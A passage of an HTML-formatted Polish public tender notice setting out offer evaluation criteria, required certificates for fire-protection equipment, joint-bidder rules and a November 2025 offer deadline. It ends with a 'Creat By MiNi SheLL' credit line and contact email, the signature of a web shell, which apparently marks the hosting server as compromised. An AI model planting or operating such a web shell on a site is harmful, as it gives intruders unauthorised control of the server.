wyłącznie oferty niepodlegające odrzuceniu. Zamawiający udzieli<br/>zamówienia Wykonawcy, którego oferta przedstawi najkorzystniejszy bilans kryteriów oceny ofert określony w niniejszym przetargu,<br/>wyliczonych zgodnie ze wzorem:<br/>Lp = Lc + Lg<br/>gdzie:<br/>Lp - łączna ilość punktów przyznanych ofercie<br/>Lc - ilość punktów przyznana badanej ofercie za kryterium „cena”<br/>Lg - ilość punktów przyznana badanej ofercie za kryterium „gwarancja i rękojmia”<br/>Szczegółowy opis znajduje się w rozdz. XVIII SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja i rekojmia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Dla części nr 1 i części nr 2 zamówienia Wykonawca, na potwierdzenie niepodlegania wykluczeniu, składa oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego - wzór stanowi załącznik 4.1 do SWZ lub załączniku 4.2 do SWZ (odpowiednio do części, o którą ubiega się Wykonawca).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.	W celu potwierdzenia zgodności oferowanych dostaw z wymaganiami, cechami lub kryteriami oceny ofert Wykonawca wraz z ofertą składa następujące przedmiotowe środki dowodowe – dotyczy części nr 1 zamówienia:<br/>1)	raport z badań wystawiony przez jednostkę notyfikowaną potwierdzającą oceniane parametry wykazane w formularzu ofertowym (wypełniony załącznik nr 2.1 do SWZ) - Zamawiający wymaga by oceniane parametry zostały wskazane w dokumencie.<br/>2)	ważny, w dniu składania ofert, certyfikat badania typu UE na oferowany przedmiot zamówienia wydany przez upoważnioną do tego jednostkę notyfikowaną,<br/>3)	aktualne i ważne świadectwo dopuszczenia do stosowania w ochronie przeciwpożarowej na oferowany towar wydane przez CNBOP-PIB zgodnie z Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 20 czerwca 2007 r. w sprawie wykazu wyrobów służących zapewnieniu bezpieczeństwa publicznego lub ochronie zdrowia i życia oraz mienia, a także zasad wydawania dopuszczenia tych wyrobów do użytkowania (Dz.U. z 2007 r., nr 143, poz. 1002 z późn. zm.). <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1. Przedmiotowe środki dowodowe podlegające uzupełnieniu:<br/>1)	raport z badań wystawiony przez jednostkę notyfikowaną potwierdzającą oceniane parametry wykazane w formularzu ofertowym (wypełniony załącznik nr 2.1 do SWZ) - Zamawiający wymaga by oceniane parametry zostały wskazane w dokumencie.<br/>2) ważny, w dniu składania ofert, certyfikat badania typu UE na oferowany przedmiot zamówienia wydany przez upoważnioną do tego jednostkę notyfikowaną,<br/>3)	aktualne i ważne świadectwo dopuszczenia do stosowania w ochronie przeciwpożarowej na oferowany towar wydane przez CNBOP-PIB zgodnie z Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 20 czerwca 2007 r. w sprawie wykazu wyrobów służących zapewnieniu bezpieczeństwa publicznego lub ochronie zdrowia i życia oraz mienia, a także zasad wydawania dopuszczenia tych wyrobów do użytkowania (Dz.U. z 2007 r., nr 143, poz. 1002 z późn. zm.).<br/>2. Jeżeli Wykonawca nie złoży przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe są niekompletne, Zamawiający wzywa do ich złożenia lub uzupełnienia w wyznaczonym terminie. <br/>2. Jeżeli przedmiotowy środek dowodowy służy potwierdzeniu<br/>zgodności z cechami lub kryteriami określonymi w opisie kryteriów oceny ofert lub pomimo, złożenia przedmiotowego środka dowodowego, oferta podlega odrzuceniu albo zachodzą przesłanki unieważnienia postępowania. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) pełnomocnictwo upoważniające do złożenia oferty – (o ile ofertę składa pełnomocnik). Pełnomocnictwo do złożenia oferty<br/>musi być złożone w oryginale w takiej samej formie, jak składana oferta. Dopuszcza się także złożenie elektronicznej kopii<br/>(skanu) pełnomocnictwa sporządzonego uprzednio w formie pisemnej, w formie elektronicznego poświadczenia<br/>sporządzonego stosownie do art. 97 § 2 ustawy z dnia 14 lutego 1991 r. - Prawo o notariacie. Elektroniczna kopia<br/>pełnomocnictwa nie może być uwierzytelniona przez upełnomocnionego,<br/>2) pełnomocnictwo do reprezentowania w postępowaniu (dotyczy ofert składanych przez Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia). W przypadku wspólników spółki cywilnej dopuszczalne jest przedłożenie umowy<br/>spółki cywilnej, z której wynika zakres i sposób reprezentacji, a w przypadku konsorcjum przedłożenie umowy konsorcjum,<br/>3) zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w art. 118 ust. 3 ustawy Pzp, do oddania mu do<br/>dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów (w<br/>przypadku gdy Wykonawca polega na zdolnościach podmiotów udostępniających zasoby) – załącznik nr 4 do SWZ,<br/>4) oświadczenie wykonawców ubiegających się wspólnie zgodne z art. 117 ust. 4 ustawy Pzp (w przypadku wykonawców<br/>ubiegających się) – na formularzu oferty,<br/>5) uzasadnienie, że zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa w rozumieniu art. 11 ust. 4 ustawy z dnia<br/>16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (t.j. Dz. U. z 2022 r., poz. 1233) (jeśli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy.<br/>2) Z treści pełnomocnictwa winno jednoznacznie wynikać prawo pełnomocnika do reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia publicznego albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego w imieniu wykonawcy. Dokument ten winien być podpisany przez osobę/osoby uprawnioną(-e) do jego udzielenia, tj. zgodnie z formą reprezentacji każdego z Wykonawców.<br/>3) Oryginał pełnomocnictwa w postaci elektronicznej lub kopia potwierdzona notarialnie, powinny być załączone do oferty i zawierać w szczególności wskazanie:<br/>3.1) postępowania o zamówienie publiczne, którego dotyczą,<br/>3.2) wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem<br/>adresu siedziby,<br/>3.3) ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>4) Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z pełnomocnikiem.<br/>5) W przypadku wspólników spółki cywilnej dopuszczalne jest przedłożenie umowy spółki cywilnej, z której wynika zakres i sposób reprezentacji, a w przypadku konsorcjum przedłożenie umowy konsorcjum.<br/>6) Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>7) Wykonawcy wspólnie ubiegający się o zamówienie składają oświadczenie, z którego wynika, które dostawy wykonają poszczególni Wykonawcy (na formularzu oferty).<br/>8) W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, spełnienie co najmniej dwóch odrębnych warunków udziału w postępowaniu Wykonawcy mogą wykazać łącznie, chyba że SWZ stanowi inaczej. Każdy z<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia wykazuje brak podstaw wykluczenia (jeżeli dotyczy).<br/>9) W przypadku wyboru oferty złożonej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia Zamawiający będzie żądał przed zawarciem umowy przedstawienia umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany umowy bez przeprowadzenia nowego postępowania o udzielenie zamówienia, w zakresie i na warunkach określonych w projektowanych postanowieniach umowy w sprawie zamówienia publicznego, stanowiących załączniki nr 3 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-11-07 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-d3859f96-c173-4bf2-93d5-3083833489ff</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-11-07 10:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Zamawiający nie wymaga i nie dopuszcza składania ofert wariantowych, o których mowa w art. 281 ust. 2 pkt 6 ustawy Pzp.<br/>2.	Zamawiający nie przewiduje zawarcia umowy ramowej.<br/>3.	Zamawiający nie przewiduje zamówień, o których mowa w art. 214 ust. 1 pkt 8 ustawy Pzp.<br/>4.	Rozliczenie pomiędzy Zamawiającym a Wykonawcą będą prowadzone w PLN. Zamawiający nie przewiduje rozliczenia w walutach obcych.<br/>5.	Zamawiający nie przewiduje aukcji elektronicznej.<br/>6.	Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.<br/>7.	Zamawiający nie przewiduje stosowania wymagań, o których mowa w art. 94 oraz 96 ust. 2 pkt 2.

Creat By MiNi SheLL
Email: jattceo@gmail.com